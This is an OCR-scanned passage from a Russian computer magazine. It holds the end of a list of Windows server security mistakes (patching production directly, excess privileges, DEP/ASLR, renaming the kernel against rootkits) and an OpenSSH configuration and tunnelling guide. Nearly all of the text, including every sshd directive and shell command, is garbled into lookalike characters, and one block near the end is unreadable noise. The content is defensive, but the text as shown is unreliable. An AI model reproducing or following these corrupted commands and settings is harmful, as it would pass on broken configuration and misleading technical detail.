разработчика ОрепВЗБ), что Соге20ио содержит огромное 
количество ошибок, многие из которых допускают удален- 
ный захват управления, стало очередной сенсацией года 
(таге. іп1о/?1=орепЪ5б-тІ5с&т= 118296441702631) . 

Часть ошибок может быть исправлена программным путем 
(и разработчики ОрепВЗБ сделали это, в отличие от лагеря 
N4 -подобных систем) , часть — обновлением микрокода 
процессора (для чего, в свою очередь, необходимо обновить 
версию ВЮЗ, если только разработчики прошивки включили 
в нее обновленный микрокод) . Но все эти меры лишь умень- 
шают вероятность атаки, а оставшиеся ошибки исправля- 



ются исключительно заменой процессора на более новый 
(кстати говоря, также содержащий ошибки, перечисленные в 
секции Еггага обновленной спецификации от ІШеІ, распро- 
страняемой на свободной основе) . 

Выход: почаще обновлять прошивку ВЮЗ, в критических 
случаях использовать ОрепВЗО, разработчики которой 
прилагают все усилия для исправления ошибок ЦП, а еще 
лучше не использовать Соге 2 Био, поскольку это все-таки 
«бытовой» процессор, не отвечающий жестким требованиям 
серверной индустрии. 

#3 — ИЗЛИШНЯЯ сложность 

Чем сложнее система, тем выше вероятность внезапных отка- 
зов, и тем проще ее атаковать, найдя слабейшее звено в линии 
обороны. Если администратор не пользуется удаленным 
доступом к реестру, зачем оставлять эту службу включенной? 
ИЗ, бесспорно, могучая вещь, однако так ли он необходим 
небольшой организации, обслуживающей сотни (ну, пускай 
даже тысячи) подключений в день? Сайт с движком на РНР 
— отличная штука, это современно и круто ! А как же ошибки 
в скриптах или самом РНР-интерпретаторе? Почему бы не 
попробовать установить что-нибудь наподобие 5МАІХ НТТР- 
сервера? Бесплатный, к тому же, поддерживает практически 
все функции, которые только могут понадобиться, обладает 
приятным интерфейсом, не требователен к системным 
ресурсам... 

Или ситуация, когда начинающий администратор для трид- 
цати манагеров вместо простой одноранговой сети разверты- 
вает доменную структуру, работающую по принципу «сейчас 
опять все развалится», — вообще живая классика. 

Вывод: система должна быть предельно простой и не содер- 
жать ничего лишнего (тем не менее, стоит помнить, что иная 
простота хуже воровства) . 

# 4 — РЕЖЕМ «ВЖИВУЮ» БЕЗ НАРКОЗА 

Практически все администраторы устанавливают заплатки 
непосредственно на «продакшен» сервере (при активной 
службе \/ѴіпсІоѵѵ5 ПрсіаГе это происходит автоматически), 

— даже не задумываясь, какому риску они себя подвергают, 
не говоря уже про обновление прошивки ВЮЗ. 

В лучшем случае после установки очередной порции заплаток 
возникают мелкие неприятные конфликты. Гораздо хуже. 



> ІП^О 

• Утилита зіе (Эузіет 
Рііе Сбескег. зиррогі. 
тісгозоЙ.сот/ 
кЬ/310747 ) входит в 
состав ѴѴіп2кЗ/ѴѴіп2к8 
и осуществляет 
проверку всех защи- 
щенных системных 
файлов и замену 
неправильных версий 
правильными. Ее 
можно использовать 
после сбоя системы, 
вредоносного дейст- 
вия вирусов и для 
настройки размера 
файлового кэша. 

• РЕР элементарно 
обходится атакой типа 
геіигп21іЬс, позволя- 
ющей атакующему вы- 
зывать АРІ -функции, 
присваивающие стеку 
атрибуты исполняе- 
мого. 

• РаХ — это патч к ядру 
Ці п их, предоставля- 
ющий возможность на- 
строить минимальные 
правадоступа при- 
ложений кстраницам 
памяти. 

• Благодаря А5І_К, при 
каждой загрузке опе- 
рационной системы 
критически важные 
данные записывают- 
ся в разные участки 
памяти. Это усложняет 
проведение атак, 
поскольку системный 
код оказывается в 
случайном месте. 




Ветки реестра, ответственные за уста- 
новку адреса сервера автоматических 
обновлений 
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> Іі пкз 

• Официальный сайт 
пакета ВийегЗЫеІсІ: 
ѵѵѵѵѵѵ.зуз-тападе. 
сот . 

• Процессоры Соге 
2 Оио содержат 
огромное количество 
ошибок, многие из 
кото р ы х до пу с ка ют 
удаленный захват 
управления, см. таге. 
іпіо/?1=орепЬ5СІ- 
тізс&т=1 18296441 
702631 . 



если система вообще откажется грузиться или «забасту- 
ют» критические приложения сторонних разработчиков, 
что, кстати говоря, более чем вероятно (очень часто, после 
выпуска заплатки, следом за ней МісгозоЙ выпускает кучу 
инструкций по устранению конфликтов) . Естественно, это 
относится только к популярным программным комплексам, 
хорошо известным на Западе. Акак быть, если приложение 
складского учета, упакованное разработчиками неимоверно 
крутым протектором (чтобы злые хакеры не взломали), скру- 
чивает дулю и выдает голубой экран смерти или «всего лишь» 
аварийно завершает свою работу сразу же после запуска? 
Выход: создать точную копию основного сервера, устанавли- 
вая заплатки/обновления сначала на ней, и, если после более 
или менее полного цикла тестирования никаких побочных 
эффектов не выявится, переносить заплатки на основной 
сервер. Конечно, это требует дополнительных расходов, и при 
«тугом» бюджете сервер-клон можно организовать и на вир- 
туальной машине, не забывая, что она работает с виртуаль- 
ным железом и потому потенциально не способна выявить 
ряд конфликтов. Однако это все же лучше, чем совсем ничего. 

# 5 — ПАКЕТЫ ОБНОВЛЕНИЙ И ДИСТРИБУТИВЫ 

Популярный способ «поднятия» упавшего сервера — ус- 
тановка операционной системы поверх уже имеющейся. 
Прием не то, чтобы хороший или красивый, однако в жестких 
временных рамках и при отсутствии резервной копии — это 
единственно возможное решение. 

Проблема в том, что после установки Зегѵісе Раск’ов «родной» 
дистрибутив системы отказывается устанавливаться поверх 
более новой версии, предлагая либо вообще отказаться от ин- 
сталляции, либо удалить старую систему и поставить новую 
с нуля, переустанавливая все остальные программы, на что 
может уйти несколько рабочих дней (и бессонных ночей) . 

К счастью, пакеты обновлений могут быть интегрированы 
непосредственно в сам дистрибутив (чему посвящено огром- 
ное количество статей, так что не будем повторяться, тем 
более что описать процесс интеграции в двух словах все равно 
не получится) . Желательно обновлять дистрибутивный диск 
при каждой установке Зегѵісе Раск’а, чтобы потом лихора- 
дочно не интегрировать его впопыхах, рискуя окончательно 
завалить систему, которой только полная переустановка и 
поможет. 

Как вариант, можно заблаговременно создать образ системы 
с помощью N 011011 СЬозП, Асгопіз Тше Іта^е или штатной ути- 
литы п ЬЬаскир . ехе. Однако следует помнить: программы, 
установленные после создания образа, при этом перестанут 



работать, а изменения настроек системы также окажутся 
утерянными. Так что, резервируйся чаще. 

#6 — ОН СЛИШКОМ МНОГО ДОВЕРЯЛ... 

Практически все ѴѴЕВ/РТР/МАІЬ сервера по умолчанию 
устанавливают себя с привилегиями администратора, а то и 
системы (зузпет), получая доступ ко всем файлам, которые 
только есть. Как следствие — любая ошибка конфигурации 
сервера, любой дефект РНР/РегІ-скрипта, любая дыра самого 
сервера позволяют атакующему получить доступ к секретной 
информации или уничтожить данные. 

Как защититься? Очень просто! Достаточно запускать сервер 
из-под ограниченного аккаунта, имеющего доступ к тем и 
только тем файлам, которые ему необходимы. Что это за фай- 
лы? Во-первых, файлы самого сервера, во-вторых, публичные 
файлы, раздаваемые пользователям. Конечно, если в сервере 
или скриптах имеется дыра, то злоумышленник по-прежнему 
сможет изменять конфигурацию сервера, а также получать 
несанкционированный доступ к файлам других пользовате- 
лей, не предназначенным всяким «левым» лицам. 

Тем не менее, разделение привилегий на уровне файловой 
системы существенно ограничивает потенциальный ущерб, 
наносимый злоумышленником. Важно не забывать, что мно- 
гие файлы по умолчанию доступы всем, и потому админист- 
ратору следует тщательно проверить атрибуты секретности, 
явно обозначив круг лиц, имеющих право на чтение/запись 
каждого более или менее значимого файла. 

Может ли злоумышленник обойти ограничения доступа, 
налагаемые файловой системой? Безусловно. Но для этого 
ему придется найти дыру, предоставляющую привилегии 
ядра или позволяющую повышать права до уровня админис- 
тратора. Такие дыры действительно есть, но их сравнительно 
немного, и МісгозоЙ их быстро затыкает. 

#7 — йЕРИА5І_К 

В ѴѴіп2кЗ 5Р1 появилась поддержка неисполняемого стека 
и кучи, известная под аббревиатурой ЭЕР фана ЕхесиНіоп 
РгеѵепНіоп) , которая по умолчанию распространяется на все 
процессы (в ХР по дефолту БЕР включен только для систем- 
ных компонентов) . 

Насколько эффективна такая защита? Во-первых, она требует 
обязательной поддержки со стороны процессора, позволяю- 
щего выставлять биты ИХ/ХЕ) не только для целых селекто- 
ров, как это было ранее, но и на уровне отдельных страниц. 
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Без аппаратной поддержки ЭЕР вообще никак 
не работает. Во-вторых, БЕР представляет собой 
довольно конфликтную штуку, препятствующую 
функционированию многих честных про- 
грамм. В-третьих, вся эта защита элементарно 
обходится атакой типа геШгп2НЬс, позволяющей 
атакующему вызывать АРІ-функции. Активный 
ЭЕР отсекает лишь «пионерские» ехріоіг’ы, про- 
тестированные наХР, но не нюхавшие ѴѴіп2кЗ 
5Р1 и выше. 

Для предотвращения атаки необходимо задейст- 
вовать рандомизацию адресного пространства 

(АсШгезз Зрасе БауоШ: Капсіотігагіоп или, сокращенно, А5ІЛ), реализован- 
ную в ѴѴіп2к8, а также в защитных пакетах независимых производителей, 
работающих хоть на ѴѴіп2к и не требующих аппаратной поддержки ЫХ/ХЕ) 
битов. Одним из таких пакетов является Ви^егЗЫеЫ, представляющий 
собой коммерческий порт известного проекта РаХ (реализован на Еіпих- 
системах) . 

#8 — ПРЕДСКАЗУЕМОСТЬ КОНФИГУРАЦИИ СИСТЕМЫ 

Успешность большинства атак объясняется высокой предсказуемостью 
конфигурации системы в установке по умолчанию. 

В мире открытых исходных текстов администратор может (идол- 
жен!) перекомпилировать все и вся, чтобы никакой хакер ни за что 
не догадался, по каким адресам лежат интересующие его функции. 

С ѴѴіпсІоѵѵз в этом плане ситуация намного сложнее, но не полностью 
безнадежна. Переименование ядра — эффективный способ борьбы с 
гоогкп’ами, определяющими адреса функций путем вызова функции 
ЬоасІЫЪгагу ( "пѣозкгпі . ехе " ) без проверки реального имени ядра, 
задаваемого через ключ «/кегпеі-» файла Ьооі . і п і. Рекомендует- 
ся переименовать ядро, например, в зоигіг.ехе, а вместо Шозкгпі.ехе 
положить ядро от другой версии системы, чтобы адреса экспортируемых 
функций отличались. 

Те гоогкп’ы, что правят файл непосредственно на диске, уйдут лесом, не до- 
стигнув желаемой цели (ведь п Ьозкгп 1 . ехе уже никак не используется) . 
Те же гоогкп’ы, что осуществляют перехват в оперативной памяти, залезут 
совсем не в ту степь и вызовут В5СЮ, что хоть и неприятно, но успешное 
внедрение гоогкк’а было бы еще хуже. 

Естественно, после переименования ядра его необходимо обновить в кэше 
утилиты зіс.ехе (иначе она немедленно его восстановит), а перед уста- 
новкой пакетов обновлений — выполнить откат назад, поскольку пакеты 
обновлений (как и гоогкп’ы) не проверяют реального имени ядра. 
Установка системы на диск, отличный от С ; , также уменьшает вероят- 
ность успешной атаки — большинство зловредных программ слишком 
бестолковы, а их создатели слишком ленивы, чтобы проверить перемен- 
ные окружения, вот они и используют фиксированные абсолютные пути. 

#9 — БОРТОВОЙ ЖУРНАЛ КАПИТАНА НЕМО 

Реестр — это крайне вредное изобретение, порождающее множество труд- 




Эксперименталыный ѴѴіп2кЗ, воздвигнутый подѴМѵѵаге 



неразрешимых проблем. Текстовые конфигурационные файлы (традици- 
онные для ІЖІХ-систем) удобны тем, что в них можно оставлять ремарки и 
в процессе внесения изменений блокировать старые параметры символом 
комментария, существенно упрощая откат в случае неудачи. 

А реестр? ! Хорошо, если систему обслуживает всего один администра- 
тор, худо-бедно помнящий, какие параметры он менял и зачем. Когда же 
администраторов несколько, и все они вносят изменения в реестр, работа 
превращается в сплошной разбор полетов: «кто трогал реестр и весь его 
вытрогал?» 

Чтобы этого не происходило, необходимо вести журнал (предпочтитель- 
нее всего на бумаге), описывающий каждое изменение конфигурации 
системы с указанием причин и сохранением предыдущих значений, заве- 
ренных подписью администратора. Тогда, если система начнет вести себя 
нестабильно, или же на ней обнаружатся черви, ломанувшиеся в широко 
открытые двери, всегда можно установить, кто именно их открыл, и чем 
он руководствовался. 

Кстати, в нормальных фирмаху администратора есть инструкция, внятно 
объясняющая, какие действия он вправе выполнять, а какие — нет. Экспери- 
менты с системой на продакшен машинах (без предварительного согласова- 
ния с руководством) в общем случае строго запрещены. И это правильно ! 

#10 — РАСПЛАТА ЗА БЕЗДУМНОСТЬ 

Никакие защитные комплексы не дают 100% гарантии, и от риска быть 
атакованным никуда не деться, увы. А потому необходимо заранее 
выработать четкий и отлаженный план выхода из ситуации. Обнаружив 
на компьютере зловредную программу, мало удалить ее. Необходимо, как 
минимум, определить, что она успела натворить. Помимо традиционных 
охранных комплексов, сервер должен быть оснащен снифферами и про- 
чими шпионами всех мастей, протоколирующими максимум возможных 
действий и сохраняющими результат своей деятельности на носители 
однократной записи (СБ Д)ѴЕ)-І1), уничтожить которые никакой хакер не в 
состоянии. Они должны позволять полностью реконструировать последо- 
вательность событий, прямо или косвенно связанных с атакой. 

Отсутствие подобных средств существенно ослабляет безопасность систе- 
мы, поскольку, вспоминая слова Жеглова, степень защиты определяется 
не стойкостью сервера к атакам, а скоростью и успешностью раскрытия 
различных несанкционированных действий. ~іг 
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Калейдоскоп 



№ 

УЛЬЯНА СМЕЛАЯ 



ТАИНЫХ ЗНАНИИ 



0РЕЫ55Н: ЮВЕЛИРНОЕ КОНФИГУРИРОВАНИЕ И ИЗЫСКАННЫЕ МЕТОДЫ ИСПОЛЬЗОВАНИЯ 



За последние несколько лет ОрепЗЗН из простого набора программ для за- 
щищенной системы регистрации, выполнения команд на удаленном хосте 
и передачи файлов с одной машины на другую превратился в швейцарский 
армейский нож, потрясающий своими возможностями. Бьюсь об заклад, ты 
не используешь и половину из них. 



С МЕСТА В КАРЬЕР 

ОрепЗЗН включен практически во все варианты *піх-систем, поэтому не 
будем останавливаться на инсталляции и сразу перейдем к настройкам, 
секретным трюкам и советам. 

Чтобы просмотреть настройки, убрав пустые строки и комментарии, 
используем команду: 

% едгер -ѵ ,/ч #' /еЪс/ззЬ/зз]ісІ_соп:Еід | едгер -ѵ ' л $ ' 



Кроме того, есть еще ряд параметров, устанавливаемых по умолчанию. 
Традиционно для ЗЗН-соединений используется ТСР-порт 22. За это отве- 
чает директива РоіТ. 

Практика показывает, что стоит появиться новому серверу, как через неко- 
торое время к нему подтягиваются программы-брутфорсеры. В большинст- 
ве случаев работают они по простому алгоритму: сначала проверяется 
диапазон ІР-адресов на наличие открытого 22 порта, и если таковые будут 
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найдены, запускается программа перебора пароля. 

Самым простым способом защиты является изменение порта 
по умолчанию. Выставляем: 

РогР 8022 

При подключении к системе следует указать порт при помо- 
щи ключа ' -р ' : 

$ ззЪ. -р8022 изег@127 . 0 . 0 . 1 

Естественно, такой подход не сможет защитить от опытного 
хакера, но большинство примитивных скриптов «не найдут» 
спрятанный сервер 53Н. Плюс, повесив на 22 порт ловуш- 
ку ЬопеуроГ, можно отлавливать и блокировать подобные 
попытки. 

Параметр АсЫгеззРатіІу позволяет определить адресное 
пространство, с которым придется иметь дело серверу и 
подключающимся клиентам. Его отсутствие в файле конфи- 
гурации означает установку значения «апу» — то есть сервер 
готов работать с протоколами ІРѵ4 и ІРѵб. Я использую только 
первый из них: 

АсІсігеззРатіІу іпеС 

Актуальна версия ОрепЗЗН 5.0/5.0р1, которая полностью 
совместима с 55Н 1.3, 1.5 и 2.0. Защищенность протокола 
53Н 1 по нынешним меркам считается недостаточной и 
по умолчанию используется 55Н 2, устойчивый к атакам 
типа тап-іп-гііе-тісісііе, ТСР-1іцаскіп§ и ВЫБ-зрооПп^. Все 
современные клиенты (БесигеСКТ, РиНіу, ТегаТегт Рго) 
умеют работать с 55Н 2, поэтому нет смысла активиро- 
вать 55Н 1: 

РгоЪосоІ 2 



НАСТРОЙКИ ДОСТУПА 

По умолчанию ззЬсІ принимает подключения на всех интер- 
фейсах, что нужно далеко не всегда. Если не требуется захо- 
дить на сервер «извне», то ограничь его работу определенным 
адресом с помощью параметра Ьізі епАсІсігезз: 

# Ьізі: епАсІсігезз 0.0. 0.0 

ЬізЬ епАсІсігезз 192.168.1.2 

Кстати, дополнительно через двоеточие можно указать и 
номер порта, в этом случае значение РоП игнорируется. 

В большинстве дистрибутивов в целях безопасности 
доступ суперпользователю по 55Н закрыт 
( Регті іКооѣЬодіп по), и при попытке зарегистриро- 
ваться под гоон мы получаем сообщение об ошибке. Для 
выполнения задач, требующих привилегий администра- 
тора, приходится заходить под обычным пользователем 
и использовать зи или зисіо. Красиво выйти из ситуации 
поможет директива Маі ей. В качестве аргумента ей пере- 
дается критерий отбора (С7зег, Огоир, НозЬ,Ад.с1гезз), его 
значение и параметр, который нужно применить. Для при- 
мера разрешим подключение под гооі: только с ІосаШозІ и 
из доверенной подсети 192.168.5.0/24: 

Регті ЬКооЬЬодіп по 
МаЬсЬ. НозЬ 192 . 168 . 5 . * ,127 . 0 . 0 . 1 
РегтіЬКооЬЬодіп уез 

По дефолту доступ к серверу разрешен для всех групп и поль- 
зователей. С помощью параметров АІІоѵѵІІзегз/АІІоѵѵСгоирз, 
ОепуИзегз/ОепуСгоирз можно указать, кому разрешены, а 
кому запрещены входящие 35Н-подключения. В качестве 
примера создадим отдельную группу, членам которой и будет 
разрешен доступ : 




> \ПІО 

• Чтобы работал 
форвардинг, параметр 
АІІоѵѵТсрРо гѵѵа гсііпд 

в файле 55М_сопбд 
должен быть установ- 
лен в значение «уез». 

• Програм- 
ма СІизІегББН 

1 сІи5іег55Ь.5Іпеі ] 

позволяет открыть 
несколько соединений 
по 55Н и одновремен- 
но выполнять на них 
команды. 

• С помощью 5НР5 
(БНеІІ РіІеБузіет. збіз. 
5І. пеі ) очень просто 
монтировать файло- 
вые системы, располо- 
женные на удаленных 
компьютерах. 



Сжатие потока можно регулировать при помощи опций: $ зисіо а(і(ідгоир --дісі 450 ззЫодіп 

$ зисіо асісіизег ре^а ззЫодіп 

Сошргеззіоп уез 

СотргеззіопЬеѵеІ 6 # Допустимые значения от 1 до 9 В конфиг ОрепЗБН прописываем: 



Высшую степень компрессии стоит применять только при АІІоШзегз ас1тіп@212 .34.10.* 

дорогостоящем трафике или медленных каналах. АІІомСгоирз ззЫодіп 
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При помощи СІизІегЗЗН можно легко управлятьсразу несколькими системами 




> Ііпкз 

По адресу ѵѵѵѵѵѵ. 
І^гапкеп.сіе/ 
Ьотерадез/іоЬаппез/ 
ѵог1:гаеде/55Ь2 іпЬаІІ. 
еп.ЬітІ ты найдешь 
отличное руководс- 
тво по созданию 
туннелей. 



В ОеЬіап и ШшпШ для аутентификации по умолчанию 
используется С85АРІ (Сепегіс ЗесигПу Зегѵісез АррНсагіоп 
Рго§гапшііп§ Іпгегіасе), что обычно требует времени. Есть 
смысл использовать этот механизм только совместно с 
КегЬегоз 5, иначе его можно отключить, уменьшив задержку. 
Одновременно запретим использование одноразовых паро- 
лей на базе системы 5/Кеу: 

СЗЗАРІАиСЬепСісаСіоп по 
СЬаІІепдеКезропзеАиІіЬепРісакіоп по 

Несколько параметров в 5з11с1_сопй§ позволяют контролиро- 
вать время работы и бездействия клиента, но они не всегда 
так уж полезны. Например, по умолчанию ТСРКеерАІіѵе 
установлен в «уез»; это означает, что сервер будет периоди- 
чески проверять, находится ли клиент «на линии» — если он 
не отвечает, соединение автоматически разрывается. И хотя с 
ним системные ресурсы не расходуются зря, в целях безопас- 
ности его лучше отключить: 

ТСРКеерАІіѵе по 

Хакер, анализируя такие пакеты, может провести ряд сетевых 
атак, поэтому вместо ТСРКеерАІіѵе лучше использовать 
директивы: 

СІіепДАІіѵеІпДегѵаІ 15 
СІіепРАІіѵеСоипДМах 3 

Следующие два параметра позволяют контролировать не- 
удачные подключения к серверу: 

ЬодіпСгасеТіше 60 
МахЗДагДирз 2:50:10 

Параметр ЬодіпСгасеТіте определяет, по истечению ка- 
кого времени простаивающее подключение будет разорвано 
(в секундах). Значение по умолчанию (120) явно завышено. 
Количество параллельных неаутентифицированных подклю- 
чений к серверу контролируется при помощи МахЗЬагЬирз. 
Запись параметра имеет форму «зіагі :гаЬе: Тиіі». В 
нашем случае она означает отключение с вероятностью 50% 
при наличии двух неаутентифицированных связей с линей- 
ным ростом вероятности до 100% при достижении 10. 
Установки в файлах /еіс/ззіі/ззіігс или ~/ . ззіі/гс 
позволяют выполнить действия при регистрации пользова- 



теля. Здесь можно использовать любые команды оболочки. 
Например, отправляем на почту уведомление, что в систему 
по ззЬ. зашел пользователь: 

$ зшЗо ѵіш /е^с/ззЬ/ззЬгс 

есЬо $ (Ьаке) $ЗЗН_СОШЕСТІОЫ $113ЕК $ЗЗН_ТТУ I 
шаіі -з "ззЬ. Іодіп" асЗшіп@(іошаіп. ги 

Таким образом, можно полностью контролировать 
подключения. 

ЗОЛОТЫЕ КЛЮЧИКИ 

Аутентификация при помощи пароля не всегда безопасна, 
поэтому некоторые зесигііу-специалисты советуют ее отклю- 
чить и воспользоваться авторизацией по ключам: 

РаззмогсіАиСІіепСісакіоп по 
РиЬкеуАиЫіеп^ісаРіоп уез 

Чтобы подстраховаться, стоит ограничить доступ беспароль- 
ным клиентам. Нужные параметры можно указывать прямо в 

~/ . ззіі/ аиЫгіогІ2:е6._кеуз: 

$ ѵіш . ззЬ/аи 1 :ЬогІ 2 ес 1 _кеуз 

Ггот= "192.168.0.* / 212.34. XX. УУ" ззЬ-гза 

АААА [ . . . ] 

Здесь же допускается задавать команды, которые будут вы- 
званы при подключении: 

соттапсі= " ззЬ -к изег@192 . 168 . 5 . 201 " ззЬ-гза 
АААА [ . . . ] 

Этот подход можно использовать для создания бэкапов. Гене- 
рируем пару ключей (секретный и публичный) : 

$ зшЗо ззЬ-кеудеп -к гза -С 1 гешоке Ьаскир’ 
СепегаЬіпд риЫіс/ргіѵа^е гза кеу раіг. 

ЕпЬег Гііе іп ѵЛіісЪ. Ьо заѵе Ыіе кеу (/Коте/ 
изег/ . ззк/і(і_гза) : /Ьоте/изег/ . ззЬ/іс1_гза_ 
Ьаскир 

Добавляем публичный ключ в список авторизованных клю- 
чей на удаленной системе: 

$ ззЬ гетокеЬозк "тксііг -т 700 . ззЬ; шпазк 
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Конфиг ОрепЗЗН 

077"; \ 

саР > . ззЬ/аиРІіогІ 2 еб_кеуз " < . зз!і/іб_гза_Ъаскир. 

риЬ 

Затем редактируем а и іЬогі ге<і_кеуз (ключ '-Р ' следует использовать при 
запуске программ, требующих для работы наличия псевдотерминала) : 

$ ззЬ. -1: гетоРеІюзР ѵіш . зз1і/аиРІіогІ2еб_кеуз 
Ргот= "192. 168.0.*, 2 12. 34 .XX . УУ " , соттапб= " сб /ѵтогк; Раг 
сѵі — ./* I Ъгір2 -9",по-рРу,по-адепР-Рог\л7агбіпд,по- 
ХІІ-Рогмагбіпд.по-рогР-Рогѵ^агбіпд ззЬ-гза АААА[ . . . ] 

И запускаем процедуру резервного копирования: 

$ ззЬ. -і . ззЪ/іб_гза_Ъаскир гетоРекозР > \ 

-/Ъаскир/ѵтогк- ' баре +%б%ш%У .Раг.Ъг2 2>/беѵ/пи11 

Каталог /ѵюгк, находящийся на сервере гетоСеЬозС, будет сохранен в 
архив ~/Ъаскир/ѵюгк-11052008 . Ьаг.Ъг2. 

ЗАЩИЩАЕМ СЕТЕВЫЕ СОЕДИНЕНИЯ 

Используя 88Н, можно защитить информацию, которая передается про- 
граммами, не имеющими встроенных механизмов шифрования соедине- 
ния. Например, сделаем бэкап с помощью д.итр ( 8) на удаленный сервер: 

$ зибо бишр -Оаи -Р — /беѵ/гѵ?б1а I дгір -9 I \ 

ззЬ. гешоРеІюзР ' бб оР=сѵз_Ъаскир . бишр . дг ' 

Хотя, если немного постараться, бишр можно и без применения каналов 
подружить с ззЬ: 

$ ззЬ. гешоРеЬ-ОзР РоисЬ /Рюше /из ег/сѵз .бишр 
$ епѵ КЗН= ' ѵбіісЬ. ззЬ' зибо -Е бишр 0Р гешоРеІюзР : /Ьоше/ 
изег/сѵз .бишр /сѵз 

Передать файл, используя ОрепЗЗН, можно одним из следующих способов: 



$ Раг 2 сР /собіпд I ззіі гетоРеІюзР 

'саР > собіпд. Рдг ' 

Примечание редактора: при трансфере двоич- 
ных данных всегда проверяй размер исходных 
и целевых файлов — баги могут подстерегать в 
самых неожиданных местах: 

% бб іР=/беѵ/агапбот оР=/Ртр/Рі1е1 

Ъз=1к сошіР=1к 2>/беѵ/пи11 

% ззіі -Р ІосаІІіозР "саР /Ртр/Рііеі" 

>/Ртр/Рі1е2 

% 1з -1 /Ртр/Рііе* 

— гѵ7-г--г-- 1 апбгизкоск ѵібгс 
1048576 Мау 11 13:55 /Ртр/Рііеі 

— гѵ7-г--г-- 1 апбгизкоск ѵізгс 
1066982 Мау 11 13:56 /Ртр/Рі1е2 

Чтобы рекурсивно отправить весь каталог, 
набираем: 

$ зср -г шубіг изег@РюзР . бошаіп. 
ги : ~/ 



Для безопасного получения почты к РеИсЬтаіІ 
легко прикрутить ззіі. Для этого создаем файл 
~/. ^еСсЪтаіІгс с содержанием: 

роіі ІосаІІіозР Ѵ7ІРЬ. ргоРосоІ рорЗ апб рогР 8110: 

ргесоппесР "ззЬ -Р -д -С изег@213 . 167 .ХХ.УУ \ 

-Ь 8110 : 213 . 167 .XX. УУ : 110 зіеер 10" раззѵ/огб 
поібеа; 

Забираем почту: 

$ РеРсЬшаіІ 

1 шеззаде Рог изег ар ІосаІІіозР (8062 осРеРз) . 
геабіпд шеззаде изег@1оса11юзР . бошаіп. ги: 1 оР 1 (8062 
осРеРз) Ріизкеб 

Организовав защищенный туннель, можно перенаправить в него любой 
трафик. Например, смонтируем удаленный ресурс ЗатЪа по каналу, орга- 
низованному через 88Н: 

$ ззЪ. -Ь 8139 : бошаіп. ги: 139 изегОботаіп. ги 

88Н-форвардинг в зависимости от того, где перенаправляются пакеты, 
можно организов ать двумя способами : локально (ключ ' -I# ' ) или уда- 
ленно ( ' - К ' ) . Во многих системах открывать соединения с портами ниже 
1024 имеет право только гооі, поэтому выбираем 8139. Теперь монтируем 
удаленный ресурс: 

$ зшЪшоипР //бошаіп. ги/зЬаге /шпР -о изегпате=изег , ір=1о 
саІІюзР ,рогР=8139 

Аналогично можно туннелировать и любой другой трафик. Например, 
организуем подключение к удаленному ЗМТР-серверу через 88Н: 

# ззЪ. -Ь 2 5 : бошаіп. ги: 25 из ег ©бошаіп . ги 

Альтернативным решением будет использование файла аиЦпогі геб_ 
кеуз и запуск с помощью хіпеРб. 



# саР ~/ . ззк/Ршіпе1_кеу 

$ саР шуіііе I ззЬ гешоРекозР 'саР >шуіі1е' сошшапб="пс ІосаІІіозР 25 " ,по-Х11-Рогшагбіпд,по-адепР- 
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■і т -і 4 ни ска. ив. □ і 

ьпі «ЧВД^ЧЯчОТЧв 1, ЗрНЗДі I Т (М* Я Рчі »йТ 
ИЩІ ККНІГЧ •^ІЦЕЧ-ИІ'ІП 3*Е» /г№иМда_ЗСпГ[д 
Щіиіді ІмШпф філсгл Ідг ■ 

±ьл}-- сілгжіі^ і-» іет ш а і і;и-іы □ ц з=гь тг 

яи;1 СппсЕХол ■»! ЛЩ-іЛшІ. 

Ми;: ЕШтПЕт 41* ІІШІ /.»•!!■ ЕйспІП / Ч К" I 

«Ьід; ематест ги* еічмг ^.кы^С4_/*» ідо с 

«ВДІ В «■411. Г т Щ.» ІГ44Ш X *ІГѵіа_в4і 1>сч 1 

ИЬъЧІ ЕмМ* ргчиѵі, 2 ь. 'ІИЕ* “'>^4 Н'Ш" ЙНЧіКН_Л7рІ №ІШ Ч'^НіпЕи 

] 

=*ІМ|І1- «ЩИ: ПИПНВ_В Эр; Впіп Ьеіяі(іі: р,1 Цорф-Щ 

В«Ья: Гглса м гдрчЕ ІЬП 1,1 г «=Ф І 0 Г ргіЕк :С І-Р 

Мид!: ЬЕг.*; пгЫЬВ 1,1 Мпд ІѴІ- 7.Р Вд^тЛУІ А Іа] «Ы.«і ічіЬл-Еиа I 

іім) на. кііініТ № 

МЫ]І: 5Ъі*_«й_*Еч1МТ Е*си.«Ф 

Ш . і і і + г -.: I, І ИЧ ММІИ ІК М* 'ЧІ ЧЧ 

Ммдіі. ■>*■: сит ■«'■(' ікт-ГР с вс іяюрЛ іѵч 

=чь^ 1 : ИН? ЧСЧІР.ЯІ ЧЧі^-?ТПй;*ч1Ь]1^И7| мгі 

Мир! «тСч чнз. № кгі рн иі 

Мид: Х1НІ ЧІЬ ►."■ С" МП 1НЗТ 1ГІ 

мл: «фМЕЬпд ІйМ.ри.иі.Ім ш.чпт 

Мид; . і-йіс ' ши. ійв.э. : ■ и *га місвм и* № пнт >*» . 

ЕКВДЙ ►Йг-в Ец і*» / МѴкВйИ.ЯМ»-: 

пЬді <кпт> ит>^( ««■«( 

идцді: №: К» ЧИСТ им 
4Ьр: «ткСп; УИР КК ЩЖГП 
М»л: «н^іиг. ,4»! гё г*сг|га± 

МидЗ: ІІИІГ ИМ. ИНКЕ <«|<1 М 
ЙЬрІ- ІЫЦЦ^ПГІСІ МіЗѵіЛ 



изегййотаіп.ги 

дгоирз = уез 

Ъіпй = 127.0.0.1 

} 

ПРОДВИНУТОЕ ИСПОЛЬЗОВАНИЕ .55Н/С0ЫРІ6 

Другой вариант настройки форвардинга — использование 
файла — / . ббЪ/соп йд. Например, настроим 192.168.1.1 
на перенаправление входящей и исходящей почты по шифро- 
ванному каналу для клиентов из 192. 168 . 1 . 0/24 на таіі. 
(іошаіп.ги : 

$ѵіт.55М/сопйд 

НозЬ таіі 

Козйпате таіі . сіотаіп. ги 
ЪосаІРогѵгагсІ 192 .168.1.1: 8025 таіі . 
сіотаіп. ги : 25 

ЬосаІРогмагй 192 .168.1.1: 8110 таіі . 
сіотаіп . ги : 1 1 0 

ЬосаІРогѵгагй 192 .168.1.1: 8143 таіі . 
сіотаіп. ги: 143 



Создаем 50СК5-сервер 



ЕаСеиауРогЬз уез 



іогѵпагсііпд , по-рогр-іогмагсііпд ззіі-гза АААА[ . . . ] 

Подключаемся : 

# ззЬ -і ~/ . ззЬ/Риппе1_кеу изег ©сіотаіп. ги 



В ответ должны получить баннер удаленного почтового сервера. Теперь 
создаем файл для хіпеісі : 



$ висіо ѵіт /еІс/хіпеЫ.с1/5тІр 


зегѵісе зтСр 
